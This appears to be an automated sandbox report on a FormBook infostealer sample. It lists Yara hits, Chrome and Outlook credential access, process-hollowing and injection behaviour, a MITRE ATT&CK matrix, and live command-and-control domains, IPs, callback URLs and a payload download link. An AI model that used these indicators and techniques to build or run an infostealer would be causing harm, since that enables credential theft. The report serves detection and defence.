          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\SC_0017384.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		1
          Registry Run Keys / Startup Folder          		612
          Process Injection          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		1
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium4
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          PowerShell          		Boot or Logon Initialization Scripts1
          Registry Run Keys / Startup Folder          		11
          Deobfuscate/Decode Files or Information          		1
          Input Capture          		13
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth11
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
          Obfuscated Files or Information          		Security Account Manager121
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration5
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Software Packing          		NTDS2
          Process Discovery          		Distributed Component Object Model1
          Input Capture          		Scheduled Transfer16
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Masquerading          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common31
          Virtualization/Sandbox Evasion          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items612
          Process Injection          		DCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 831200 Sample: SC_0017384.exe Startdate: 21/03/2023 Architecture: WINDOWS Score: 100 53 www.funhood.life 2->53 77 Snort IDS alert for network traffic 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Multi AV Scanner detection for submitted file 2->81 83 3 other signatures 2->83 11 SC_0017384.exe 16 7 2->11         started        signatures3 process4 dnsIp5 61 a.uguu.se 188.40.83.211, 443, 49698, 49700 HETZNER-ASDE Germany 11->61 47 C:\Users\user\AppData\...\Lvdnyvcvr.exe, PE32 11->47 dropped 49 C:\Users\...\Lvdnyvcvr.exe:Zone.Identifier, ASCII 11->49 dropped 51 C:\Users\user\AppData\...\SC_0017384.exe.log, ASCII 11->51 dropped 103 Encrypted powershell cmdline option found 11->103 105 Injects a PE file into a foreign processes 11->105 16 SC_0017384.exe 11->16         started        19 powershell.exe 16 11->19         started        file6 signatures7 process8 signatures9 69 Modifies the context of a thread in another process (thread injection) 16->69 71 Maps a DLL or memory area into another process 16->71 73 Sample uses process hollowing technique 16->73 75 Queues an APC in another process (thread injection) 16->75 21 explorer.exe 6 5 16->21 injected 25 conhost.exe 19->25         started        process10 dnsIp11 55 www.emprendizajesocial.com 217.160.0.229, 49703, 49704, 80 ONEANDONE-ASBrauerstrasse48DE Germany 21->55 57 www.findmyoriginstory.com 74.208.236.131, 49702, 80 ONEANDONE-ASBrauerstrasse48DE United States 21->57 59 5 other IPs or domains 21->59 85 System process connects to network (likely due to code injection or exploit) 21->85 27 Lvdnyvcvr.exe 14 4 21->27         started        31 systray.exe 13 21->31         started        33 Lvdnyvcvr.exe 21->33         started        signatures12 process13 dnsIp14 63 a.uguu.se 27->63 87 Multi AV Scanner detection for dropped file 27->87 89 Machine Learning detection for dropped file 27->89 91 Encrypted powershell cmdline option found 27->91 35 powershell.exe 27->35         started        37 Lvdnyvcvr.exe 27->37         started        93 Tries to steal Mail credentials (via file / registry access) 31->93 95 Tries to harvest and steal browser information (history, passwords, etc) 31->95 97 Modifies the context of a thread in another process (thread injection) 31->97 99 Maps a DLL or memory area into another process 31->99 65 192.168.2.1 unknown unknown 33->65 67 a.uguu.se 33->67 101 Injects a PE file into a foreign processes 33->101 39 powershell.exe 33->39         started        41 Lvdnyvcvr.exe 33->41         started        signatures15 process16 process17 43 conhost.exe 35->43         started        45 conhost.exe 39->45         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SC_0017384.exe13%ReversingLabsWin32.Trojan.Woreflint
          SC_0017384.exe18%VirustotalBrowse
          SC_0017384.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe13%ReversingLabsWin32.Trojan.Woreflint

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.SC_0017384.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.madisoncountylincoln.com0%VirustotalBrowse
          brunaeleandro.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://james.newtonking.com/projects/json0%URL Reputationsafe
          https://a.uguu.se4Dp0%Avira URL Cloudsafe
          http://www.funhood.lifewww.funhood.life0%Avira URL Cloudsafe
          http://www.rw-bau.com/t4np/0%Avira URL Cloudsafe
          http://www.madisoncountylincoln.com0%Avira URL Cloudsafe
          http://www.emprendizajesocial.com/t4np/0%Avira URL Cloudsafe
          http://www.evelycosmetique.comwww.evelycosmetique.com0%Avira URL Cloudsafe
          http://www.brunaeleandro.comwww.brunaeleandro.com0%Avira URL Cloudsafe
          http://www.metatv.app0%Avira URL Cloudsafe
          http://www.groupekoriolis.com0%Avira URL Cloudsafe
          http://www.myprojoints.comwww.myprojoints.com0%Avira URL Cloudsafe
          http://www.groupekoriolis.com/t4np/0%Avira URL Cloudsafe
          http://www.33347.netwww.33347.net0%Avira URL Cloudsafe
          http://www.madisoncountylincoln.com/0%Avira URL Cloudsafe
          http://www.mejawajib.shop0%Avira URL Cloudsafe
          https://www.casar.com/assunto/casamentos/decoracao-de-casamento/0%Avira URL Cloudsafe
          https://www.casar.com/assunto/lua-de-mel-2/0%Avira URL Cloudsafe
          https://www.casar.com0%Avira URL Cloudsafe
          https://www.casar.com/assunto/organizacao/0%Avira URL Cloudsafe
          http://www.funhood.life0%Avira URL Cloudsafe
          http://www.brunaeleandro.com0%Avira URL Cloudsafe
          http://www.findmyoriginstory.comwww.findmyoriginstory.com0%Avira URL Cloudsafe
          http://www.mnsmanagmentsolutions.com0%Avira URL Cloudsafe
          http://www.findmyoriginstory.com0%Avira URL Cloudsafe
          http://www.sistemadanetflix.site/t4np/0%Avira URL Cloudsafe
          http://www.sistemadanetflix.sitewww.sistemadanetflix.site0%Avira URL Cloudsafe
          http://www.babupaul.comwww.babupaul.com0%Avira URL Cloudsafe
          https://www.casar.com/assunto/noivas/dicas-para-noivas/0%Avira URL Cloudsafe
          http://www.evelycosmetique.com0%Avira URL Cloudsafe
          http://www.icste-conference.org0%Avira URL Cloudsafe
          http://www.33347.net0%Avira URL Cloudsafe
          http://www.rw-bau.comwww.rw-bau.com0%Avira URL Cloudsafe
          http://www.mejawajib.shopwww.mejawajib.shop0%Avira URL Cloudsafe
          http://www.myprojoints.com0%Avira URL Cloudsafe
          http://www.babupaul.com/t4np/0%Avira URL Cloudsafe
          http://www.metatv.app/t4np/0%Avira URL Cloudsafe
          http://www.madisoncountylincoln.com/t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOKK/wDsahaMH4CpYcAMUMZFiGwLHjB+0Oq1wXjzAJPnkBdjV2xmRY1HYDRMeq0YWMvPw2aK61dkA==0%Avira URL Cloudsafe
          http://www.metatv.app/t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRrzq40ElafmJhvJj1LcshAib7Ivom6LHCQSa6JmmrJNk5dNV7FfRE38dwcSsWQdgWRuTjAoEA==&LAIu=TchAG450%Avira URL Cloudsafe
          http://www.madisoncountylincoln.com/t4np/0%Avira URL Cloudsafe
          https://www.casar.com/assunto/casamentos/casamentos-reais/0%Avira URL Cloudsafe
          http://www.funhood.life/t4np/0%Avira URL Cloudsafe
          http://www.emprendizajesocial.com/t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g==0%Avira URL Cloudsafe
          http://www.sistemadanetflix.site0%Avira URL Cloudsafe
          https://www.casar.com/assunto/cha-de-panela/0%Avira URL Cloudsafe
          http://www.findmyoriginstory.com/t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0Rf1qUZs10N2udgS/CtBUsUx15VFtNYN9iDnYFh77a6AF4rH5pFyFnuGOqSZvoPy3IjvUZKwOXw==0%Avira URL Cloudsafe
          https://www.casar.com/assunto/noivas/vestidos-de-noiva/0%Avira URL Cloudsafe
          http://www.brunaeleandro.com/t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXmfsqsK09kjaHK361RIlxqLtgkaoztB9HOqO+kj7AmSjC7tsKJawScM9XI/2xtyFPsJZxirw==&LAIu=TchAG450%Avira URL Cloudsafe
          http://www.findmyoriginstory.com/t4np/0%Avira URL Cloudsafe
          https://br.enterprise.wibson.io/banner.js?siteId=78509e00-767d-4326-9529-f0d523c8137c0%Avira URL Cloudsafe
          http://www.mejawajib.shop/t4np/0%Avira URL Cloudsafe
          http://www.rw-bau.com0%Avira URL Cloudsafe
          http://www.mnsmanagmentsolutions.comwww.mnsmanagmentsolutions.com0%Avira URL Cloudsafe
          http://www.madisoncountylincoln.comwww.madisoncountylincoln.com0%Avira URL Cloudsafe
          http://www.icste-conference.org/t4np/0%Avira URL Cloudsafe
          http://www.babupaul.com0%Avira URL Cloudsafe
          http://www.icste-conference.orgwww.icste-conference.org0%Avira URL Cloudsafe
          http://www.mnsmanagmentsolutions.com/t4np/0%Avira URL Cloudsafe
          http://www.groupekoriolis.comwww.groupekoriolis.com0%Avira URL Cloudsafe
          http://www.myprojoints.com/t4np/0%Avira URL Cloudsafe
          https://urn.to/r/sds_see5bad0%Avira URL Cloudsafe
          http://www.emprendizajesocial.com0%Avira URL Cloudsafe
          http://www.emprendizajesocial.comwww.emprendizajesocial.com0%Avira URL Cloudsafe
          http://www.metatv.appwww.metatv.app0%Avira URL Cloudsafe
          https://ajuda.casar.com0%Avira URL Cloudsafe
          http://www.33347.net/t4np/0%Avira URL Cloudsafe
          http://www.brunaeleandro.com/t4np/0%Avira URL Cloudsafe
          http://www.evelycosmetique.com/t4np/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.madisoncountylincoln.com
          		172.67.152.24
          		truetrueunknown
          a.uguu.se
          		188.40.83.211
          		truefalse
            		high
            www.funhood.life
            		162.213.249.254
            		truefalse
              		unknown
              brunaeleandro.com
              		54.85.86.211
              		truetrueunknown
              www.emprendizajesocial.com
              		217.160.0.229
              		truetrue
                		unknown
                www.metatv.app
                		172.67.194.225
                		truetrue
                  		unknown
                  www.findmyoriginstory.com
                  		74.208.236.131
                  		truetrue
                    		unknown
                    www.brunaeleandro.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.myprojoints.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.emprendizajesocial.com/t4np/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.metatv.app/t4np/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.madisoncountylincoln.com/t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOKK/wDsahaMH4CpYcAMUMZFiGwLHjB+0Oq1wXjzAJPnkBdjV2xmRY1HYDRMeq0YWMvPw2aK61dkA==true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.metatv.app/t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRrzq40ElafmJhvJj1LcshAib7Ivom6LHCQSa6JmmrJNk5dNV7FfRE38dwcSsWQdgWRuTjAoEA==&LAIu=TchAG45true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.madisoncountylincoln.com/t4np/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.emprendizajesocial.com/t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g==true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.findmyoriginstory.com/t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0Rf1qUZs10N2udgS/CtBUsUx15VFtNYN9iDnYFh77a6AF4rH5pFyFnuGOqSZvoPy3IjvUZKwOXw==true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.brunaeleandro.com/t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXmfsqsK09kjaHK361RIlxqLtgkaoztB9HOqO+kj7AmSjC7tsKJawScM9XI/2xtyFPsJZxirw==&LAIu=TchAG45true
                        • Avira URL Cloud: safe
                        		unknown
                        https://a.uguu.se/fwvfviJb.datfalse
                          		high
                          http://www.brunaeleandro.com/t4np/true
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabM61Ae5o9b.8.drfalse
                            		high
